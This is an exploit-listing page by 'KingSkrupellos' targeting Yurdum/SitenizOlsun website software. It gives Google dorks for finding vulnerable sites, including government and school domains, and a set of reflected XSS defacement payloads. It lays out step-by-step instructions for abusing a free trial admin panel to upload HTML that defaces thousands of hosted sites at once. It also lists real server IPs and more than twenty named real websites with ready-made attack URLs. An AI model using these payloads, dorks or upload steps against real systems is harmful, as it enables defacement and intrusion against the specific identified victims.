Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CWE-79 | Unknown | Critical |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2019-06-17 |
################################################################### # Exploit Title : Yurdum Software Reflected XSS Privilege Escalation # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 17/06/2019 # Vendor Homepages : yurdumyazilim.com ~ sitenizolsun.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : High # Vulnerability Type : CWE-79 [ Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') ] CWE-671 [ Lack of Administrator Control over Security ] CWE-522 [ Insufficiently Protected Credentials ] CWE-284 [ Improper Access Control ] CWE-285 [ Improper Authorization ] # Google Dorks : inurl:/?pnum= intext:Yer salayc: Yurdum Yazlm site:tr inurl:/?pnum= intext:Yer salayc: SitenizOlsun. site:tr intext:Yer salayc: SitenizOlsun site:tr intext:Yer salayc: Yurdum Yazlm site:tr inurl:/?pnum= site:tr inurl:/?pnum= site:gov.tr inurl:/?pnum= site:bel.tr inurl:/?pnum= site:k12.tr inurl:/?pnum= site:org.tr inurl:/?pnum= site:com.tr inurl:/?pnum= site:com inurl:/?pnum= site:net inurl:/?pnum= site:org # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos # Reference Link : cxsecurity.com/ascii/WLB-2019010038 ################################################################### Impact 1 Reflected XSS Cross Site Scripting (or Non-Persistent) : ********************************************************* The server reads data directly from the HTTP request and reflects it back in the HTTP response. Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content to a vulnerable web application, which is then reflected back to the victim and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to the victim. URLs constructed in this manner constitute the core of many phishing schemes, whereby an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects the attacker's content back to the victim,the content is executed by the victim's browser. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected site and allow the attacker to access sensitive browser-based information. An attacker, for example,can exploit this vulnerability to steal cookies from the attacked user in order to hijack a session and gain access to the system. Impact 2 Lack of Administrator Control over Security : *********************************************** The product uses security features in a way that prevents the product's administrator from tailoring security settings to reflect the environment in which the product is being used. This introduces resultant weaknesses or prevents it from operating at a level of security that is desired by the administrator.This weakness occurs when the application transmits or stores authentication credentials and uses an insecure method that is susceptible to unauthorized interception and/or retrieval.The software does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action. An attacker could gain access to user accounts and access sensitive data used by the user accounts. ################################################################### # Reflected Cross Site Scripting XSS Exploits and Payloads : ******************************************************* 1%27<marquee><font%20color=lime%20size=32>XSS-Vulnerability-Found-By-KingSkrupellos</font></marquee> 1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E /?pnum=1&pt=1%27"></h3></tr></td></table></tr></td></table></div><marquee>XSS-Vulnerability-Found-By-KingSkrupellos /?pnum=1&pt=1%27<marquee><font%20color=lime%20size=32>KingSkrupellos</font></marquee> /?pnum=1&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee> /?pnum=[ID-NUMBER]&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee> /?SyfNmb=3&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee> /?SyfNmb=[ID-NUMBER]&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee> /?Syf=4&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee> /?Syf=[ID-NUMBER]&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee> /?product=1&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee> /?product=[ID-NUMBER]&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee> # Add Administrator / Privilege Escalation Vulnerability : *********************************************** To Take Administrator Account Register to sitenizolsun.com => Click '' cretsiz Dene " [ Try Free ] Then you will redirected to this address. sitenizolsun.com/website-temalari?paket=6 sitenizolsun.com/website-temalari?paket=[ID-NUMBER] Choose one packet which you want. sitenizolsun.com/website-ucretsiz-deneme-form.php?website-theme=6&paket=6 sitenizolsun.com/website-ucretsiz-deneme-form.php?website-theme=[ID-NUMBER]&paket=[ID-NUMBER] cretsiz Deneme Web Siteni Olutur [ Create your Free Test Account ] Create any Random username - Create Random or your real E-Mail Address - Create Title - Random Phone Number Then Click " Sitemi Olutur " [ Create My Website ]. Please Wait. It will create test site and administrator e-mail address and password. http://[TEST-TARGET-WEBSITE-HERE].denemepaketi.com Ynetim paneli kullanc adnz: YOUR ADMINISTRATOR E-MAIL ADDRESS HERE Ynetim paneli ifreniz : YOUR ADMINISTRATOR PASSWORD HERE Administrator Login Path : /login/ /login/do_login.php One Free Test Website - But you can control approximately 9397 websites at the same. You can upload files to the vulnerable system. Step 1 : Go to the " Temel Sayfalar " [ Main Pages ] => Anasayfa [ Homepage ] => Step 2 : Click to " Anasayfay Dzenle " [ Edit Homepage ] Step 3 : Choose " Resim Ekle " [ Insert Image ] => Click to " Kaynak " [ Source ] Step 4 : /syp/dosyayukle.php?DosyaTipi=2 http://[TEST-TARGET-WEBSITE-HERE].denemepaketi.com/syp/dosyayukle.php?DosyaTipi=2 You will see a yellow and white page and it says : Step 5 : Yklemek istediiniz dosyalar "Gzat"a tklayarak bilgisayarnzdan seiniz ve "Ykle" ye tklaynz. [ Select the files you want to upload from your computer by clicking "Browse" and click "Upload". ] Step 6 : Choose " Sayfaya sdr (Resimler iin geerli) Max 30 MB " Step 7 : Choose your .html file from your PC and upload it. But choose HTML. Click " Ykle " [ Upload ] Button. Your File Destination : /FileUpload/epXXXXXX/File/[yourfilename.html] If you another sections such as " Add Header Image " or " Add Album " Your File Destination : /FileUpload/epXXXXXX/HeaderImages/crop/[RANDOM-NUMBERS].jpg /FileUpload/epXXXXXX/Album/epXXXXXX_[YEAR][MONTH][DAY][RANDOM-NUMBERS].jpg You can see your defaced indexes on 9397 websites at the same. Congratulations :) ################################################################### # Example Vulnerable Sites for XSS Reflected Cross Site Scripting : *********************************************************** Vulnerable IP Addresses => 51.254.33.49 => There are 37 domains hosted on this server. 81.171.1.140 => There are 8,552 domains hosted on this server. 159.69.209.93 => There are 798 domains hosted on this server. [+] gurelektrikotomasyon.com/?Syf=4&pt=1%27%3Cmarquee%3E%3CfAnt %20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] giresunkesaparnavutkoy.com/?SyfNmb=2&pt=1%27%3Cmarquee%3E %3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] gezintihaberleri.com/?SyfNmb=4&pt=1%27%3Cmarquee%3E%3Cfont %20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] furkankirtasiye.com/?pnum=8&pt=1%27%3Cmarquee%3E%3Cfont %20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] edirneselimiyeemlak.com/?Syf=13&pt=1%27%3Cmarquee%3E%3Cfont %20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] giresunkesaparnavutkoy.com/?SyfNmb=2&pt=1%27%3Cmarquee%3E %3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] doganisguvenligi.com/?Syf=21&pt=1%27%3Cmarquee%3E%3Cfont %20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] cyberenerji.com/?pnum=9&pt=1%27%3Cmarquee%3E%3Cfont %20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] siirtfistikpazari.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont %20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] saglamelektronik.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont %20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] radyobalkan.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont %20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] pediatrikkalpcerrahisi.com/?Syf=15&blg=1&ncat_id=699210&pt= 1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked %20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] ozerdeminsaatdekorasyon.com/?pnum=1&pt=1%27%3Cmarquee %3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] otoarizatespit.org/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont %20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] onaranelektrik.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont %20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] oabtfizik.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color= lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] trabzonbasket.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color= lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] ozelegitimaraclari.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color= lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] reklamfolyosu.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color= lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] sivasaskf.org/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color= lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] tablopark.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color= lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] vansuaritmaci.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color= lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E [+] noktadusakabin.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color= lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E ################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ###################################################################
Copyright ©2024 Exploitalert.